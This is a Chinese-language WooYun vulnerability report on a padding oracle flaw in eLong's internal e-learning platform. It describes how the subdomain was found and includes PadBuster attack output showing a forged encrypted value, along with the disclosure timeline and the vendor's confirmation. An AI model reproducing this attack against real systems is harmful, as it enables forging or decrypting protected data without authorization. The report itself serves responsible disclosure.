当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100925

漏洞标题:艺龙旅行网某平台Padding Oracle Vulnerability信息泄露漏洞

相关厂商:艺龙旅行网

漏洞作者: 几何黑店

提交时间:2015-03-12 18:10

修复时间:2015-04-26 18:10

公开时间:2015-04-26 18:10

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-12: 细节已通知厂商并且等待厂商处理中
2015-03-12: 厂商已经确认,细节仅向厂商公开
2015-03-22: 细节向核心白帽子及相关领域专家公开
2015-04-01: 细节向普通白帽子公开
2015-04-11: 细节向实习白帽子公开
2015-04-26: 细节向公众公开

简要描述:

艺龙旅行网某平台Padding Oracle Vulnerability信息泄露漏洞

详细说明:

用猪猪侠的wydomain扫二级域名扫出来个corp.elong.com
凭经验猜想应该很多系统平台会在这个域名下,于是,百度corp.elong.com
找出来个
http://elearning.corp.elong.com/
在线学习平台
顺手看了下源代码,发现存在

QQ图片20150312095738.png


于是测试一下看是否存在Padding Oracle Vulnerability信息泄露漏洞,一试还真有.

+-------------------------------------------+
| PadBuster - v0.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 21547
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3883 N/A
2 ** 255 500 4971 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (24) [Byte 16]
[+] Success: (196) [Byte 15]
[+] Success: (27) [Byte 14]
[+] Success: (70) [Byte 13]
[+] Success: (118) [Byte 12]
[+] Success: (161) [Byte 11]
[+] Success: (20) [Byte 10]
[+] Success: (10) [Byte 9]
[+] Success: (189) [Byte 8]
[+] Success: (136) [Byte 7]
[+] Success: (213) [Byte 6]
[+] Success: (33) [Byte 5]
[+] Success: (141) [Byte 4]
[+] Success: (62) [Byte 3]
[+] Success: (200) [Byte 2]
[+] Success: (188) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): d0bb4cfe02a9e7d62c70c81d2471a118
[+] Intermediate Bytes (HEX): acc730802dde82b40213a7734218c619
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: 0LtM_gKp59YscMgdJHGhGAAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


漏洞证明:

QQ图片20150312080409.jpg


跑最后这一步实在太久了,晚上睡觉的时候开始跑,跑到下午才跑出来

修复方案:

你懂的

版权声明:转载请注明来源 几何黑店@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-03-12 20:05

厂商回复:

多谢白帽子提醒,我们会尽快修复。

最新状态:

暂无